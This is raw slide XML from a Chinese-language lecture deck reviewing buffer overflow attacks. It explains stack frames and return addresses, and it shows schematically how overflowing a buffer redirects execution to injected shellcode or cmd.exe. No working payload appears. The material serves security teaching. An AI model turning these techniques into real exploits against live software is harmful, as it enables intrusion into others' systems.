            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6451203" y="2212702"/>
            <a:ext cx="2520280" cy="861774"/>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buffer_a=k1k2k3k4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>ki:4 byte</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4647094" y="4606096"/>
            <a:ext cx="2304256" cy="861774"/>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rPr>
              <a:t>k4=addr(cmd.exe)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IP=addr(cmd.exe)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="321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2918" y="1473902"/>
            <a:ext cx="64484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74401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16" presetClass="exit" presetSubtype="21" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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16" presetClass="exit" presetSubtype="21" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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16" presetClass="exit" presetSubtype="21" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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208 0.00232 L 0.00208 0.07561 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="3653"/>
                                    </p:animMotion>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00208 0.07561 L 0.00208 0.1489 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="3653"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="57" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="58" presetID="16" presetClass="exit" presetSubtype="21" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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0.00208 0.14891 L 0.00208 0.21203 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="3145"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="65" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="66" presetID="2" presetClass="exit" presetSubtype="6" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="67" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="1+ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="68" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="1+ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="69" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="70" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="71" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="0" nodeType="after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3" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.00208 0.21203 L 0.00208 0.27492 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="81" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="3145"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="82" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="83" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="84" presetID="2" presetClass="exit" presetSubtype="2" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="85" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="1+ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="86" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="87" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="9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21538"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="102" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="321538"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="103" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="321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4" grpId="0" animBg="1"/>
      <p:bldP spid="4" grpId="1" animBg="1"/>
      <p:bldP spid="5" grpId="0" animBg="1"/>
      <p:bldP spid="5" grpId="1" animBg="1"/>
      <p:bldP spid="6" grpId="0" animBg="1"/>
      <p:bldP spid="6" grpId="1" animBg="1"/>
      <p:bldP spid="8" grpId="0"/>
      <p:bldP spid="12" grpId="0"/>
      <p:bldP spid="15" grpId="0"/>
      <p:bldP spid="17" grpId="0"/>
      <p:bldP spid="17" grpId="1"/>
      <p:bldP spid="17" grpId="2"/>
      <p:bldP spid="17" grpId="3"/>
      <p:bldP spid="19" grpId="0"/>
      <p:bldP spid="23" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="0"/>
      <p:bldP spid="27" grpId="0"/>
    </p:bld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返回地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="200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246</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>控制流程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>植入代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>流程</a:t>
            </a:r>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a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6444208" y="3013834"/>
            <a:ext cx="2520280"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EBP(m)=k2???</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6444208" y="3579703"/>
            <a:ext cx="2517452" cy="861774"/>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rPr>
              <a:t>IP = k4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>k4=addr(shellcode)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman"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buffer_b</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6441380" y="2571592"/>
            <a:ext cx="2520280" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>buffer_a=k1k2k3k4</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4405912" y="4797152"/>
            <a:ext cx="3262432" cy="830997"/>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a:t>控制流程和代码植入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>可在不同缓冲区中完成</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36245769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a:t>利用目标程序的缓冲区溢出漏洞，向缓冲区写超其长度的内容，造成缓冲区溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目标程序：提供远程服务</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>缓冲区：用于交互的局部变量、数组等在堆栈中分配的内存空间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通常没有边界检测的数组，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>破坏程序的堆栈</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使程序转而执行其它指令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290818" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>缓冲区溢出攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FEF4E944-C727-464C-85A7-E70A1F27AC09}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>247</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1640810284"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull/>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5352132"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用堆栈记录函数返回地址及函数执行环境</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——FILO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>函数执行环境：函数参数、函数的局部变量、函数返回地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>栈帧：函数过程活动记录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>每次函数产生对应栈帧</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>函数返回地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>指向代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击瞄准器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145410" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>函数调用时堆栈状况</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4951857" y="3356992"/>
            <a:ext cx="4084639" cy="3121025"/>
            <a:chOff x="1688" y="1253"/>
            <a:chExt cx="2573" cy="1966"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36868"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局部变量</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36869"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堆栈基址</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36870"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36871"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36872"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36873"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36874" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1688" y="1570"/>
              <a:ext cx="502" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US"/>
                <a:t>低端</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36875" name="Text Box 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1689" y="2523"/>
              <a:ext cx="502" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US"/>
                <a:t>高端</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36876"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36877"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36878"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79"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80"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36881"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4723830"/>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a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>攻击瞄准器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="灯片编号占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FB72DFFF-1124-4A97-ACB2-F30B7C034DC1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>248</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
